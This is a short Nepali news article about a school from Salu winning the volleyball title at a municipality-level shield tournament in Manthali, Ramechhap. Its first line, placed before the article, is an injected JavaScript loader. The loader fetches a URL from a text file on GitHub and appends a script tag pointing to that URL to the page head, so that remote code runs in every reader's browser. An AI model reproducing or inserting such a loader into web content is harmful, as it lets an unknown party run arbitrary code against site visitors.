;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);});
फागुन ०९,
रामेछाप । तेस्रो मन्थली नगरपालिका स्तरिय राष्ट्रियपति रनिङ शिल प्रतियोगिता सेतीदेवी माद्यामीक विद्यालय सालुले भलिबलको उपाधी हात पारेको छ । उसले निकै प्रतिस्पर्धामा उपाधि जितेको हो ।
गत फागुन ७ गतेदेखि ९ गते आज (आइतबार) सम्म संचालन भएकाे प्रतियोगितामा पुरुष तर्फकाे भलिबल खेलको उपाधी बेस्टब फाइबमा खेलाइएको प्रतियोगिताको मन्थली मा.विको ९ नम्बर आउदआ सालु मा.विले १५ वनाउदै जित हाँसिल गरेको हो ।
यो प्रतियोगिता निकै नै रोमान्चक बनेको थियो ।
भिडियो हेर्नुहोस्
फेसबुक प्रतिक्रियाहरु